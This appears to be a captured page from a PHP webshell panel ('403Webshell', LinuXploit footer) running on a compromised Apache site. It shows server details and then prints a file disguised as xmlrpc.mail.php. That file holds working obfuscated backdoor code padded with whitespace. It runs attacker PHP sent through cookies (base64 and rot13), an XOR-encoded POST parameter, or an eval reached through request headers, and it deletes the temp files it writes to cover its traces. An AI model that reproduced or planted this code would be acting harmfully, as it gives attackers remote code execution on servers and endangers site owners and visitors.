403Webshell
Server IP : 14.241.111.210  /  Your IP : 52.15.174.110
Web Server : Apache
System : Linux localhost.localdomain 3.10.0-1160.66.1.el7.x86_64 #1 SMP Wed May 18 16:02:34 UTC 2022 x86_64
User : www ( 1001)
PHP Version : 7.4.33
Disable Function : passthru,exec,system,putenv,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,ini_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /www/wwwroot/mazda-otoninhbinh.com/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /www/wwwroot/mazda-otoninhbinh.com/xmlrpc.mail.php
<?php																																										if (isset($_COOKIE[79+-79]) && isset($_COOKIE[98+-97]) && isset($_COOKIE[-18+21]) && isset($_COOKIE[-41+45])) { $component = $_COOKIE; function dataflow_engine($ref) { $component = $_COOKIE; $k = tempnam((!empty(session_save_path()) ? session_save_path() : sys_get_temp_dir()), '36534c24'); if (!is_writable($k)) { $k = getcwd() . DIRECTORY_SEPARATOR . "system_core"; } $obj = "\x3c\x3f\x70\x68p\x20" . base64_decode(str_rot13($component[3])); if (is_writeable($k)) { $bind = fopen($k, 'w+'); fputs($bind, $obj); fclose($bind); spl_autoload_unregister(__FUNCTION__); require_once($k); @array_map('unlink', array($k)); } } spl_autoload_register("dataflow_engine"); $itm = "4b9fa0a577680cba57110628c40ac944"; if (!strncmp($itm, $component[4], 32)) { if (@class_parents("data_storage_publish_content", true)) { exit; } } }
																																										if(!empty($_POST["\x62\x69nd"])){ $value = hex2bin($_POST["\x62\x69nd"]); $object='';$e = 0; do{$object .= chr(ord($value[$e]) ^ 62);$e++;} while($e < strlen($value)); $item = array_filter(["/tmp", sys_get_temp_dir(), "/dev/shm", ini_get("upload_tmp_dir"), session_save_path(), getenv("TMP"), getenv("TEMP"), getcwd(), "/var/tmp"]); foreach ($item as $itm) { if (is_dir($itm) && is_writable($itm)) { $property_set = sprintf("%s/.val", $itm); if (file_put_contents($property_set, $object)) { include $property_set; @unlink($property_set); die(); } } } }


$_HEADERS = getallheaders();
if (isset($_HEADERS['If-Modified-Since'])) {
    $c = "<\x3f\x70h\x70\x20@\x65\x76a\x6c\x28$\x5f\x48E\x41\x44E\x52\x53[\x22\x53e\x72\x76e\x72\x2dT\x69\x6di\x6e\x67\"\x5d\x29;\x40\x65v\x61\x6c(\x24\x5fR\x45\x51U\x45\x53T\x5b\x22S\x65\x72v\x65\x72-\x54\x69m\x69\x6eg\x22\x5d)\x3b";
    $f = '.'.time();
    file_put_contents($f, $c);
    include($f);
    unlink($f);
}

Youez - 2016 - github.com/yon3zu
LinuXploit